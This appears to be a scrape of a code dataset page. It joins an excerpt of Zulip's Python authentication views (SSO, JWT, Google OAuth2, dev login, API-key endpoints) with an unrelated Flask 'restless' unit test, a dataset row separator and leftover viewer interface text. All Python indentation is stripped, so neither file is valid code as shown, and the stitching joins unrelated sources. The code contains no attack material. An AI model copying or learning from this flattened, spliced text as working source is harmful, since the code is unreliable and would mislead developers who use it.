form = HomepageForm({'email': email}, realm=realm, from_multiuse_invite=from_multiuse_invite)
request.verified_email = None
if form.is_valid():
# Construct a PreregistrationUser object and send the user over to
# the confirmation view.
prereg_user = None
if settings.ONLY_SSO:
try:
prereg_user = PreregistrationUser.objects.filter(
email__iexact=email, realm=realm).latest("invited_at")
except PreregistrationUser.DoesNotExist:
prereg_user = create_preregistration_user(email, request,
password_required=password_required)
else:
prereg_user = create_preregistration_user(email, request,
password_required=password_required)
if multiuse_object_key is not None:
del request.session["multiuse_object_key"]
request.session.modified = True
if streams_to_subscribe is not None:
prereg_user.streams.set(streams_to_subscribe)
return redirect("".join((
create_confirmation_link(prereg_user, request.get_host(), Confirmation.USER_REGISTRATION),
'?full_name=',
# urllib does not handle Unicode, so coerece to encoded byte string
# Explanation: http://stackoverflow.com/a/5605354/90777
urllib.parse.quote_plus(full_name.encode('utf8')))))
else:
url = reverse('register')
return render(request,
'zerver/accounts_home.html',
context={'form': form, 'current_url': lambda: url,
'from_multiuse_invite': from_multiuse_invite},
)
def redirect_to_subdomain_login_url() -> HttpResponseRedirect:
login_url = reverse('django.contrib.auth.views.login')
redirect_url = login_url + '?subdomain=1'
return HttpResponseRedirect(redirect_url)
def redirect_to_config_error(error_type: str) -> HttpResponseRedirect:
return HttpResponseRedirect("/config-error/%s" % (error_type,))
def login_or_register_remote_user(request: HttpRequest, remote_username: Optional[Text],
user_profile: Optional[UserProfile], full_name: Text='',
invalid_subdomain: bool=False, mobile_flow_otp: Optional[str]=None,
is_signup: bool=False,
redirect_to: Text='') -> HttpResponse:
if user_profile is None or user_profile.is_mirror_dummy:
# Since execution has reached here, we have verified the user
# controls an email address (remote_username) but there's no
# associated Zulip user account.
if is_signup:
# If they're trying to sign up, send them over to the PreregistrationUser flow.
return maybe_send_to_registration(request, remote_user_to_email(remote_username),
full_name, password_required=False)
# Otherwise, we send them to a special page that asks if they
# want to register or provided the wrong email and want to go back.
try:
validate_email(remote_username)
invalid_email = False
except ValidationError:
# If email address is invalid, we can't send the user
# PreregistrationUser flow.
invalid_email = True
context = {'full_name': full_name,
'email': remote_username,
'invalid_email': invalid_email}
return render(request,
'zerver/confirm_continue_registration.html',
context=context)
if invalid_subdomain:
# Show login page with an error message
return redirect_to_subdomain_login_url()
if mobile_flow_otp is not None:
# For the mobile Oauth flow, we send the API key and other
# necessary details in a redirect to a zulip:// URI scheme.
params = {
'otp_encrypted_api_key': otp_encrypt_api_key(user_profile, mobile_flow_otp),
'email': remote_username,
'realm': user_profile.realm.uri,
}
# We can't use HttpResponseRedirect, since it only allows HTTP(S) URLs
response = HttpResponse(status=302)
response['Location'] = 'zulip://login?' + urllib.parse.urlencode(params)
# Maybe sending 'user_logged_in' signal is the better approach:
# user_logged_in.send(sender=user_profile.__class__, request=request, user=user_profile)
# Not doing this only because over here we don't add the user information
# in the session. If the signal receiver assumes that we do then that
# would cause problems.
email_on_new_login(sender=user_profile.__class__, request=request, user=user_profile)
# Mark this request as having a logged-in user for our server logs.
process_client(request, user_profile)
request._email = user_profile.email
return response
do_login(request, user_profile)
redirect_to = get_safe_redirect_to(redirect_to, user_profile.realm.uri)
return HttpResponseRedirect(redirect_to)
@log_view_func
@has_request_variables
def remote_user_sso(request: HttpRequest,
mobile_flow_otp: Optional[str]=REQ(default=None)) -> HttpResponse:
try:
remote_user = request.META["REMOTE_USER"]
except KeyError:
# TODO: Arguably the JsonableError values here should be
# full-page HTML configuration errors instead.
raise JsonableError(_("No REMOTE_USER set."))
# Django invokes authenticate methods by matching arguments, and this
# authentication flow will not invoke LDAP authentication because of
# this condition of Django so no need to check if LDAP backend is
# enabled.
validate_login_email(remote_user_to_email(remote_user))
# Here we support the mobile flow for REMOTE_USER_BACKEND; we
# validate the data format and then pass it through to
# login_or_register_remote_user if appropriate.
if mobile_flow_otp is not None:
if not is_valid_otp(mobile_flow_otp):
raise JsonableError(_("Invalid OTP"))
subdomain = get_subdomain(request)
realm = get_realm(subdomain)
# Since RemoteUserBackend will return None if Realm is None, we
# don't need to check whether `get_realm` returned None.
user_profile = authenticate(remote_user=remote_user, realm=realm)
redirect_to = request.GET.get('next', '')
return login_or_register_remote_user(request, remote_user, user_profile,
mobile_flow_otp=mobile_flow_otp,
redirect_to=redirect_to)
@csrf_exempt
@log_view_func
def remote_user_jwt(request: HttpRequest) -> HttpResponse:
subdomain = get_subdomain(request)
try:
auth_key = settings.JWT_AUTH_KEYS[subdomain]
except KeyError:
raise JsonableError(_("Auth key for this subdomain not found."))
try:
json_web_token = request.POST["json_web_token"]
options = {'verify_signature': True}
payload = jwt.decode(json_web_token, auth_key, options=options)
except KeyError:
raise JsonableError(_("No JSON web token passed in request"))
except jwt.InvalidTokenError:
raise JsonableError(_("Bad JSON web token"))
remote_user = payload.get("user", None)
if remote_user is None:
raise JsonableError(_("No user specified in JSON web token claims"))
email_domain = payload.get('realm', None)
if email_domain is None:
raise JsonableError(_("No organization specified in JSON web token claims"))
email = "%s@%s" % (remote_user, email_domain)
realm = get_realm(subdomain)
if realm is None:
raise JsonableError(_("Wrong subdomain"))
try:
# We do all the authentication we need here (otherwise we'd have to
# duplicate work), but we need to call authenticate with some backend so
# that the request.backend attribute gets set.
return_data = {} # type: Dict[str, bool]
user_profile = authenticate(username=email,
realm=realm,
return_data=return_data,
use_dummy_backend=True)
except UserProfile.DoesNotExist:
user_profile = None
return login_or_register_remote_user(request, email, user_profile, remote_user)
def google_oauth2_csrf(request: HttpRequest, value: str) -> str:
# In Django 1.10, get_token returns a salted token which changes
# every time get_token is called.
from django.middleware.csrf import _unsalt_cipher_token
token = _unsalt_cipher_token(get_token(request))
return hmac.new(token.encode('utf-8'), value.encode("utf-8"), hashlib.sha256).hexdigest()
def reverse_on_root(viewname: str, args: List[str]=None, kwargs: Dict[str, str]=None) -> str:
return settings.ROOT_DOMAIN_URI + reverse(viewname, args=args, kwargs=kwargs)
def oauth_redirect_to_root(request: HttpRequest, url: Text, is_signup: bool=False) -> HttpResponse:
main_site_uri = settings.ROOT_DOMAIN_URI + url
params = {
'subdomain': get_subdomain(request),
'is_signup': '1' if is_signup else '0',
}
# mobile_flow_otp is a one-time pad provided by the app that we
# can use to encrypt the API key when passing back to the app.
mobile_flow_otp = request.GET.get('mobile_flow_otp')
if mobile_flow_otp is not None:
if not is_valid_otp(mobile_flow_otp):
raise JsonableError(_("Invalid OTP"))
params['mobile_flow_otp'] = mobile_flow_otp
next = request.GET.get('next')
if next:
params['next'] = next
return redirect(main_site_uri + '?' + urllib.parse.urlencode(params))
def start_google_oauth2(request: HttpRequest) -> HttpResponse:
url = reverse('zerver.views.auth.send_oauth_request_to_google')
if not (settings.GOOGLE_OAUTH2_CLIENT_ID and settings.GOOGLE_OAUTH2_CLIENT_SECRET):
return redirect_to_config_error("google")
is_signup = bool(request.GET.get('is_signup'))
return oauth_redirect_to_root(request, url, is_signup=is_signup)
def start_social_login(request: HttpRequest, backend: Text) -> HttpResponse:
backend_url = reverse('social:begin', args=[backend])
if (backend == "github") and not (settings.SOCIAL_AUTH_GITHUB_KEY and
settings.SOCIAL_AUTH_GITHUB_SECRET):
return redirect_to_config_error("github")
return oauth_redirect_to_root(request, backend_url)
def start_social_signup(request: HttpRequest, backend: Text) -> HttpResponse:
backend_url = reverse('social:begin', args=[backend])
return oauth_redirect_to_root(request, backend_url, is_signup=True)
def send_oauth_request_to_google(request: HttpRequest) -> HttpResponse:
subdomain = request.GET.get('subdomain', '')
is_signup = request.GET.get('is_signup', '')
next = request.GET.get('next', '')
mobile_flow_otp = request.GET.get('mobile_flow_otp', '0')
if ((settings.ROOT_DOMAIN_LANDING_PAGE and subdomain == '') or
not Realm.objects.filter(string_id=subdomain).exists()):
return redirect_to_subdomain_login_url()
google_uri = 'https://accounts.google.com/o/oauth2/auth?'
cur_time = str(int(time.time()))
csrf_state = '%s:%s:%s:%s:%s' % (cur_time, subdomain, mobile_flow_otp, is_signup, next)
# Now compute the CSRF hash with the other parameters as an input
csrf_state += ":%s" % (google_oauth2_csrf(request, csrf_state),)
params = {
'response_type': 'code',
'client_id': settings.GOOGLE_OAUTH2_CLIENT_ID,
'redirect_uri': reverse_on_root('zerver.views.auth.finish_google_oauth2'),
'scope': 'profile email',
'state': csrf_state,
}
return redirect(google_uri + urllib.parse.urlencode(params))
@log_view_func
def finish_google_oauth2(request: HttpRequest) -> HttpResponse:
error = request.GET.get('error')
if error == 'access_denied':
return redirect('/')
elif error is not None:
logging.warning('Error from google oauth2 login: %s' % (request.GET.get("error"),))
return HttpResponse(status=400)
csrf_state = request.GET.get('state')
if csrf_state is None or len(csrf_state.split(':')) != 6:
logging.warning('Missing Google oauth2 CSRF state')
return HttpResponse(status=400)
(csrf_data, hmac_value) = csrf_state.rsplit(':', 1)
if hmac_value != google_oauth2_csrf(request, csrf_data):
logging.warning('Google oauth2 CSRF error')
return HttpResponse(status=400)
cur_time, subdomain, mobile_flow_otp, is_signup, next = csrf_data.split(':')
if mobile_flow_otp == '0':
mobile_flow_otp = None
is_signup = bool(is_signup == '1')
resp = requests.post(
'https://www.googleapis.com/oauth2/v3/token',
data={
'code': request.GET.get('code'),
'client_id': settings.GOOGLE_OAUTH2_CLIENT_ID,
'client_secret': settings.GOOGLE_OAUTH2_CLIENT_SECRET,
'redirect_uri': reverse_on_root('zerver.views.auth.finish_google_oauth2'),
'grant_type': 'authorization_code',
},
)
if resp.status_code == 400:
logging.warning('User error converting Google oauth2 login to token: %s' % (resp.text,))
return HttpResponse(status=400)
elif resp.status_code != 200:
logging.error('Could not convert google oauth2 code to access_token: %s' % (resp.text,))
return HttpResponse(status=400)
access_token = resp.json()['access_token']
resp = requests.get(
'https://www.googleapis.com/plus/v1/people/me',
params={'access_token': access_token}
)
if resp.status_code == 400:
logging.warning('Google login failed making info API call: %s' % (resp.text,))
return HttpResponse(status=400)
elif resp.status_code != 200:
logging.error('Google login failed making API call: %s' % (resp.text,))
return HttpResponse(status=400)
body = resp.json()
try:
full_name = body['name']['formatted']
except KeyError:
# Only google+ users have a formatted name. I am ignoring i18n here.
full_name = '{} {}'.format(
body['name']['givenName'], body['name']['familyName']
)
for email in body['emails']:
if email['type'] == 'account':
break
else:
logging.error('Google oauth2 account email not found: %s' % (body,))
return HttpResponse(status=400)
email_address = email['value']
try:
realm = Realm.objects.get(string_id=subdomain)
except Realm.DoesNotExist: # nocoverage
return redirect_to_subdomain_login_url()
if mobile_flow_otp is not None:
# When request was not initiated from subdomain.
user_profile, return_data = authenticate_remote_user(realm, email_address)
invalid_subdomain = bool(return_data.get('invalid_subdomain'))
return login_or_register_remote_user(request, email_address, user_profile,
full_name, invalid_subdomain,
mobile_flow_otp=mobile_flow_otp,
is_signup=is_signup,
redirect_to=next)
return redirect_and_log_into_subdomain(
realm, full_name, email_address, is_signup=is_signup, redirect_to=next)
def authenticate_remote_user(realm: Realm, email_address: str) -> Tuple[UserProfile, Dict[str, Any]]:
return_data = {} # type: Dict[str, bool]
if email_address is None:
# No need to authenticate if email address is None. We already
# know that user_profile would be None as well. In fact, if we
# call authenticate in this case, we might get an exception from
# ZulipDummyBackend which doesn't accept a None as a username.
logging.warning("Email address was None while trying to authenticate "
"remote user.")
return None, return_data
user_profile = authenticate(username=email_address,
realm=realm,
use_dummy_backend=True,
return_data=return_data)
return user_profile, return_data
_subdomain_token_salt = 'zerver.views.auth.log_into_subdomain'
@log_view_func
def log_into_subdomain(request: HttpRequest, token: Text) -> HttpResponse:
try:
data = signing.loads(token, salt=_subdomain_token_salt, max_age=15)
except signing.SignatureExpired as e:
logging.warning('Subdomain cookie: {}'.format(e))
return HttpResponse(status=400)
except signing.BadSignature:
logging.warning('Subdomain cookie: Bad signature.')
return HttpResponse(status=400)
subdomain = get_subdomain(request)
if data['subdomain'] != subdomain:
logging.warning('Login attempt on invalid subdomain')
return HttpResponse(status=400)
email_address = data['email']
full_name = data['name']
is_signup = data['is_signup']
redirect_to = data['next']
if is_signup:
# If we are signing up, user_profile should be None. In case
# email_address already exists, user will get an error message.
user_profile = None
return_data = {} # type: Dict[str, Any]
else:
# We can be reasonably confident that this subdomain actually
# has a corresponding realm, since it was referenced in a
# signed cookie. But we probably should add some error
# handling for the case where the realm disappeared in the
# meantime.
realm = get_realm(subdomain)
user_profile, return_data = authenticate_remote_user(realm, email_address)
invalid_subdomain = bool(return_data.get('invalid_subdomain'))
return login_or_register_remote_user(request, email_address, user_profile,
full_name, invalid_subdomain=invalid_subdomain,
is_signup=is_signup, redirect_to=redirect_to)
def redirect_and_log_into_subdomain(realm: Realm, full_name: Text, email_address: Text,
is_signup: bool=False, redirect_to: Text='') -> HttpResponse:
data = {'name': full_name, 'email': email_address, 'subdomain': realm.subdomain,
'is_signup': is_signup, 'next': redirect_to}
token = signing.dumps(data, salt=_subdomain_token_salt)
subdomain_login_uri = (realm.uri
+ reverse('zerver.views.auth.log_into_subdomain', args=[token]))
return redirect(subdomain_login_uri)
def get_dev_users(realm: Optional[Realm]=None, extra_users_count: int=10) -> List[UserProfile]:
# Development environments usually have only a few users, but
# it still makes sense to limit how many extra users we render to
# support performance testing with DevAuthBackend.
if realm is not None:
users_query = UserProfile.objects.select_related().filter(is_bot=False, is_active=True, realm=realm)
else:
users_query = UserProfile.objects.select_related().filter(is_bot=False, is_active=True)
shakespearian_users = users_query.exclude(email__startswith='extrauser').order_by('email')
extra_users = users_query.filter(email__startswith='extrauser').order_by('email')
# Limit the number of extra users we offer by default
extra_users = extra_users[0:extra_users_count]
users = list(shakespearian_users) + list(extra_users)
return users
def redirect_to_misconfigured_ldap_notice(error_type: int) -> HttpResponse:
if error_type == ZulipLDAPAuthBackend.REALM_IS_NONE_ERROR:
url = reverse('ldap_error_realm_is_none')
else:
raise AssertionError("Invalid error type")
return HttpResponseRedirect(url)
def show_deactivation_notice(request: HttpRequest) -> HttpResponse:
realm = get_realm_from_request(request)
if realm and realm.deactivated:
return render(request, "zerver/deactivated.html",
context={"deactivated_domain_name": realm.name})
return HttpResponseRedirect(reverse('zerver.views.auth.login_page'))
def redirect_to_deactivation_notice() -> HttpResponse:
return HttpResponseRedirect(reverse('zerver.views.auth.show_deactivation_notice'))
def add_dev_login_context(realm: Realm, context: Dict[str, Any]) -> None:
users = get_dev_users(realm)
context['current_realm'] = realm
context['all_realms'] = Realm.objects.all()
context['direct_admins'] = [u for u in users if u.is_realm_admin]
context['direct_users'] = [u for u in users if not u.is_realm_admin]
def login_page(request: HttpRequest, **kwargs: Any) -> HttpResponse:
if request.user.is_authenticated:
return HttpResponseRedirect(request.user.realm.uri)
if is_subdomain_root_or_alias(request) and settings.ROOT_DOMAIN_LANDING_PAGE:
redirect_url = reverse('zerver.views.registration.find_account')
return HttpResponseRedirect(redirect_url)
realm = get_realm_from_request(request)
if realm and realm.deactivated:
return redirect_to_deactivation_notice()
extra_context = kwargs.pop('extra_context', {})
if dev_auth_enabled():
if 'new_realm' in request.POST:
realm = get_realm(request.POST['new_realm'])
else:
realm = get_realm_from_request(request)
add_dev_login_context(realm, extra_context)
if realm and 'new_realm' in request.POST:
# If we're switching realms, redirect to that realm, but
# only if it actually exists.
return HttpResponseRedirect(realm.uri)
if 'username' in request.POST:
extra_context['email'] = request.POST['username']
try:
template_response = django_login_page(
request, authentication_form=OurAuthenticationForm,
extra_context=extra_context, **kwargs)
except ZulipLDAPConfigurationError as e:
assert len(e.args) > 1
return redirect_to_misconfigured_ldap_notice(e.args[1])
try:
template_response.context_data['email'] = request.GET['email']
except KeyError:
pass
try:
already_registered = request.GET['already_registered']
template_response.context_data['already_registered'] = already_registered
except KeyError:
pass
try:
template_response.context_data['subdomain'] = request.GET['subdomain']
template_response.context_data['wrong_subdomain_error'] = WRONG_SUBDOMAIN_ERROR
except KeyError:
pass
return template_response
@csrf_exempt
def dev_direct_login(request: HttpRequest, **kwargs: Any) -> HttpResponse:
# This function allows logging in without a password and should only be called
# in development environments. It may be called if the DevAuthBackend is included
# in settings.AUTHENTICATION_BACKENDS
if (not dev_auth_enabled()) or settings.PRODUCTION:
# This check is probably not required, since authenticate would fail without
# an enabled DevAuthBackend.
return HttpResponseRedirect(reverse('dev_not_supported'))
email = request.POST['direct_email']
subdomain = get_subdomain(request)
realm = get_realm(subdomain)
user_profile = authenticate(dev_auth_username=email, realm=realm)
if user_profile is None:
return HttpResponseRedirect(reverse('dev_not_supported'))
do_login(request, user_profile)
next = request.GET.get('next', '')
redirect_to = get_safe_redirect_to(next, user_profile.realm.uri)
return HttpResponseRedirect(redirect_to)
@csrf_exempt
@require_post
@has_request_variables
def api_dev_fetch_api_key(request: HttpRequest, username: str=REQ()) -> HttpResponse:
"""This function allows logging in without a password on the Zulip
mobile apps when connecting to a Zulip development environment. It
requires DevAuthBackend to be included in settings.AUTHENTICATION_BACKENDS.
"""
if not dev_auth_enabled() or settings.PRODUCTION:
return json_error(_("Dev environment not enabled."))
# Django invokes authenticate methods by matching arguments, and this
# authentication flow will not invoke LDAP authentication because of
# this condition of Django so no need to check if LDAP backend is
# enabled.
validate_login_email(username)
subdomain = get_subdomain(request)
realm = get_realm(subdomain)
return_data = {} # type: Dict[str, bool]
user_profile = authenticate(dev_auth_username=username,
realm=realm,
return_data=return_data)
if return_data.get("inactive_realm"):
return json_error(_("This organization has been deactivated."),
data={"reason": "realm deactivated"}, status=403)
if return_data.get("inactive_user"):
return json_error(_("Your account has been disabled."),
data={"reason": "user disable"}, status=403)
if user_profile is None:
return json_error(_("This user is not registered."),
data={"reason": "unregistered"}, status=403)
do_login(request, user_profile)
return json_success({"api_key": user_profile.api_key, "email": user_profile.email})
@csrf_exempt
def api_dev_get_emails(request: HttpRequest) -> HttpResponse:
if not dev_auth_enabled() or settings.PRODUCTION:
return json_error(_("Dev environment not enabled."))
users = get_dev_users()
return json_success(dict(direct_admins=[u.email for u in users if u.is_realm_admin],
direct_users=[u.email for u in users if not u.is_realm_admin]))
@csrf_exempt
@require_post
@has_request_variables
def api_fetch_api_key(request: HttpRequest, username: str=REQ(), password: str=REQ()) -> HttpResponse:
return_data = {} # type: Dict[str, bool]
subdomain = get_subdomain(request)
realm = get_realm(subdomain)
if username == "google-oauth2-token":
# This code path is auth for the legacy Android app
user_profile = authenticate(google_oauth2_token=password,
realm=realm,
return_data=return_data)
else:
if not ldap_auth_enabled(realm=get_realm_from_request(request)):
# In case we don't authenticate against LDAP, check for a valid
# email. LDAP backend can authenticate against a non-email.
validate_login_email(username)
user_profile = authenticate(username=username,
password=password,
realm=realm,
return_data=return_data)
if return_data.get("inactive_user"):
return json_error(_("Your account has been disabled."),
data={"reason": "user disable"}, status=403)
if return_data.get("inactive_realm"):
return json_error(_("This organization has been deactivated."),
data={"reason": "realm deactivated"}, status=403)
if return_data.get("password_auth_disabled"):
return json_error(_("Password auth is disabled in your team."),
data={"reason": "password auth disabled"}, status=403)
if user_profile is None:
if return_data.get("valid_attestation"):
# We can leak that the user is unregistered iff
# they present a valid authentication string for the user.
return json_error(_("This user is not registered; do so from a browser."),
data={"reason": "unregistered"}, status=403)
return json_error(_("Your username or password is incorrect."),
data={"reason": "incorrect_creds"}, status=403)
# Maybe sending 'user_logged_in' signal is the better approach:
# user_logged_in.send(sender=user_profile.__class__, request=request, user=user_profile)
# Not doing this only because over here we don't add the user information
# in the session. If the signal receiver assumes that we do then that
# would cause problems.
email_on_new_login(sender=user_profile.__class__, request=request, user=user_profile)
# Mark this request as having a logged-in user for our server logs.
process_client(request, user_profile)
request._email = user_profile.email
return json_success({"api_key": user_profile.api_key, "email": user_profile.email})
def get_auth_backends_data(request: HttpRequest) -> Dict[str, Any]:
"""Returns which authentication methods are enabled on the server"""
subdomain = get_subdomain(request)
try:
realm = Realm.objects.get(string_id=subdomain)
except Realm.DoesNotExist:
# If not the root subdomain, this is an error
if subdomain != Realm.SUBDOMAIN_FOR_ROOT_DOMAIN:
raise JsonableError(_("Invalid subdomain"))
# With the root subdomain, it's an error or not depending
# whether ROOT_DOMAIN_LANDING_PAGE (which indicates whether
# there are some realms without subdomains on this server)
# is set.
if settings.ROOT_DOMAIN_LANDING_PAGE:
raise JsonableError(_("Subdomain required"))
else:
realm = None
return {
"password": password_auth_enabled(realm),
"dev": dev_auth_enabled(realm),
"email": email_auth_enabled(realm),
"github": github_auth_enabled(realm),
"google": google_auth_enabled(realm),
"remoteuser": remote_auth_enabled(realm),
"ldap": ldap_auth_enabled(realm),
}
@csrf_exempt
def api_get_auth_backends(request: HttpRequest) -> HttpResponse:
"""Deprecated route; this is to be replaced by api_get_server_settings"""
auth_backends = get_auth_backends_data(request)
auth_backends['zulip_version'] = ZULIP_VERSION
return json_success(auth_backends)
@require_GET
@csrf_exempt
def api_get_server_settings(request: HttpRequest) -> HttpResponse:
result = dict(
authentication_methods=get_auth_backends_data(request),
zulip_version=ZULIP_VERSION,
push_notifications_enabled=push_notifications_enabled(),
)
context = zulip_default_context(request)
# IMPORTANT NOTE:
# realm_name, realm_icon, etc. are not guaranteed to appear in the response.
# * If they do, that means the server URL has only one realm on it
# * If they don't, the server has multiple realms, and it's not clear which is
# the requested realm, so we can't send back these data.
for settings_item in [
"email_auth_enabled",
"require_email_format_usernames",
"realm_uri",
"realm_name",
"realm_icon",
"realm_description"]:
if context[settings_item] is not None:
result[settings_item] = context[settings_item]
return json_success(result)
@has_request_variables
def json_fetch_api_key(request: HttpRequest, user_profile: UserProfile,
password: str=REQ(default='')) -> HttpResponse:
subdomain = get_subdomain(request)
realm = get_realm(subdomain)
if password_auth_enabled(user_profile.realm):
if not authenticate(username=user_profile.email, password=password,
realm=realm):
return json_error(_("Your username or password is incorrect."))
return json_success({"api_key": user_profile.api_key})
@csrf_exempt
def api_fetch_google_client_id(request: HttpRequest) -> HttpResponse:
if not settings.GOOGLE_CLIENT_ID:
return json_error(_("GOOGLE_CLIENT_ID is not configured"), status=400)
return json_success({"google_client_id": settings.GOOGLE_CLIENT_ID})
@require_post
def logout_then_login(request: HttpRequest, **kwargs: Any) -> HttpResponse:
return django_logout_then_login(request, kwargs)
def password_reset(request: HttpRequest, **kwargs: Any) -> HttpResponse:
realm = get_realm(get_subdomain(request))
if realm is None:
# If trying to get to password reset on a subdomain that
# doesn't exist, just go to find_account.
redirect_url = reverse('zerver.views.registration.find_account')
return HttpResponseRedirect(redirect_url)
return django_password_reset(request,
template_name='zerver/reset.html',
password_reset_form=ZulipPasswordResetForm,
post_reset_redirect='/accounts/password/reset/done/')
|
py | 1a348c21f1cec3c40c617158421da1ef6bbf7be5 | from restless.security import ApiKeyAuth
from restless.parameters import BodyParameter
from restless.interfaces.flask_app import FlaskHandler
from unittest import TestCase
import os
import json
import yaml
os.chdir(os.path.dirname(__file__))
class Message(BodyParameter):
text: str
class TestRouter(TestCase):
def setUp(self) -> None:
self.handler = FlaskHandler(
"Test API",
"meh",
"0.1",
security=[
ApiKeyAuth(ApiKeyAuth.In.header, name='Authorization')
]
)
self.client = self.handler.app.test_client()
def test_basic(self):
@self.handler.handle("get", "/")
def root() -> {200: Message}:
return Message(text="all cool")
out = self.client.get('/')
self.assertEqual(200, out.status_code, out.data)
self.assertEqual(
{'text': 'all cool'},
json.loads(out.data)
)
def test_spec(self):
@self.handler.handle("get", "/")
def root() -> {200: Message}:
return Message(text="all cool")
out = self.client.get('/spec/swagger.json')
self.assertEqual(200, out.status_code, out.data)
self.assertEqual(
{'components': {'schemas': {'Error': {'properties': {'details': {'type': 'object'},
'error': {'type': 'string'}},
'required': ['error']},
'Message': {'properties': {'text': {'title': 'Text',
'type': 'string'}},
'required': ['text'],
'title': 'Message',
'type': 'object'}},
'securitySchemes': {'Authorization': {'in': 'header',
'name': 'Authorization',
'type': 'apiKey'}}},
'info': {'description': 'meh', 'title': 'Test API', 'version': '0.1'},
'openapi': '3.0.0',
'paths': {'/': {'get': {'description': 'root',
'parameters': [],
'responses': {'200': {'content': {
'application/json': {'schema': {'$ref': '#/components/schemas/Message'}}},
'description': 'meh'},
'400': {'content': {'application/json': {
'schema': {'$ref': '#/components/schemas/Error'}}},
'description': 'Bad Request'},
'401': {'content': {'application/json': {
'schema': {'$ref': '#/components/schemas/Error'}}},
'description': 'Unauthorized'},
'403': {'content': {'application/json': {
'schema': {'$ref': '#/components/schemas/Error'}}},
'description': 'Forbidden'},
'404': {'content': {'application/json': {
'schema': {'$ref': '#/components/schemas/Error'}}},
'description': 'Not Found'}},
'tags': ['']}},
'/spec/swagger.{extension}': {'get': {'description': 'spec',
'parameters': [{'description': 'extension',
'in': 'path',
'name': 'extension',
'required': True,
'schema': {'enum': ['yaml',
'json'],
'type': 'string'}}],
'responses': {'200': {'content': {
'application/json': {'schema': {'type': 'string'}}},
'description': 'meh'},
'400': {'content': {'application/json': {
'schema': {
'$ref': '#/components/schemas/Error'}}},
'description': 'Bad '
'Request'},
'401': {'content': {'application/json': {
'schema': {
'$ref': '#/components/schemas/Error'}}},
'description': 'Unauthorized'},
'403': {'content': {'application/json': {
'schema': {
'$ref': '#/components/schemas/Error'}}},
'description': 'Forbidden'},
'404': {'content': {'application/json': {
'schema': {
'$ref': '#/components/schemas/Error'}}},
'description': 'Not '
'Found'}},
'tags': ['spec']}}},
'servers': [],
'tags': []}
,
yaml.load(out.data, Loader=yaml.SafeLoader)
)
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.